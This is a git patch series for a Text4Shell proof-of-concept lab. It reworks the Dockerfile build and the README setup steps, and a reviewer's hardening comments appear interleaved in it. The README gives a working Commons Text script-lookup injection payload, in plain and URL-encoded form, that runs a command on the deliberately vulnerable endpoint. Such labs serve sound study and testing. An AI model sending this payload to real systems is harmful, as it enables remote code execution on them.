From 74d0319884265b8b972ef2616228432dd8e889f2 Mon Sep 17 00:00:00 2001 From: Jan Hartje Date: Mon, 14 Nov 2022 18:09:00 +0100 Subject: [PATCH 1/2] feat: streamline testing process by including build step in docker --- Dockerfile | 10 ++++++++-- README.md | 28 +++++++++++----------------- 2 files changed, 19 insertions(+), 19 deletions(-) diff --git a/Dockerfile b/Dockerfile index a31999b..44d4987 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,3 +1,9 @@ +# Build the jar File +FROM maven:latest as build +WORKDIR /app +COPY . /app +RUN mvn clean install + # Use an official OpenJDK runtime as a parent image FROM openjdk:8-jre-alpine @@ -9,10 +15,10 @@ RUN apk update && apk add bash WORKDIR /app # Copy the fat jar into the container at /app -COPY /target/text4shell-poc.jar /app +COPY --from=build /app/target/text4shell-poc.jar /app # Make port 8080 available to the world outside this container EXPOSE 8080 # Run jar file when the container launches -CMD ["java", "-jar", "text4shell-poc.jar"] \ No newline at end of file +CMD ["java", "-jar", "text4shell-poc.jar"] diff --git a/README.md b/README.md index 2452d91..7e43d0f 100644 --- a/README.md +++ b/README.md @@ -1,32 +1,26 @@ ### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu) -------------- +--- -1. Maven install to create the fat jar - -``` -mvn clean install -``` - -2. Docker build +1. Docker build ``` docker build --tag=text4shell . ``` -3. Docker run +2. Docker run ``` docker run -p 80:8080 text4shell ``` -4. Test the app +3. Test the app ``` http://localhost/text4shell/attack?search= ``` -5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: +4. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup: ``` ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} 
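Review bot: `COPY . /app` in the new build stage sends the whole build context into the image layers, and this patch adds no `.dockerignore`, so `.git`, a host-built `target/` and any local credential or IDE files in the checkout end up in the build stage and its cache. I would add a `.dockerignore` that lists at least `.git` and `target/`, or copy only what the build needs, for example `COPY pom.xml .` and `COPY src ./src` (this assumes the standard Maven layout, which the patch does not show). `RUN mvn -B package` is enough here, because `install` only adds a copy of the jar to the stage's local repository, which is discarded with the stage. A one-line comment above `COPY` saying what the context is expected to contain would help whoever builds this lab image next.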
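Review bot: The final stage copies the jar with `COPY --from=build /app/target/text4shell-poc.jar /app` and starts it with `CMD ["java", "-jar", ...]`, and no `USER` instruction is visible in this hunk. Unless one is set in the lines between the two hunks, the deliberately vulnerable service, and any command it is made to run, executes as root inside the container. I would create an unprivileged account before the copy (`RUN addgroup -S app && adduser -S -G app app`), copy with `COPY --from=build --chown=app:app /app/target/text4shell-poc.jar /app/`, and put `USER app` ahead of `CMD`. The README's `/tmp/foo` check still works as that user. The README step `docker run -p 80:8080 text4shell` also publishes the endpoint on every host interface; `-p 127.0.0.1:80:8080` keeps the lab reachable only from the local machine.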
@@ -34,28 +28,28 @@ ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D -6. You can also try using `dns` or `url` prefixes. +5. You can also try using `dns` or `url` prefixes. -7. Get the container id +6. Get the container id ``` docker container ls ``` -8. Get into the app +7. Get into the app ``` docker exec -it bash ``` -9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): +8. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory): ``` ls /tmp/ ``` -10. To stop the container +9. To stop the container ``` docker container stop -``` \ No newline at end of file +``` From 8b6e3e873884c7ffd6c28b2e653127ae40a8f75d Mon Sep 17 00:00:00 2001 From: Jan Hartje Date: Mon, 14 Nov 2022 18:12:36 +0100 Subject: [PATCH 2/2] fix: remove latest tag from maven --- Dockerfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Dockerfile b/Dockerfile index 44d4987..7ed5626 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,5 +1,5 @@ # Build the jar File -FROM maven:latest as build +FROM maven:3.8.6-eclipse-temurin-8-alpine as build WORKDIR /app COPY . /app RUN mvn clean install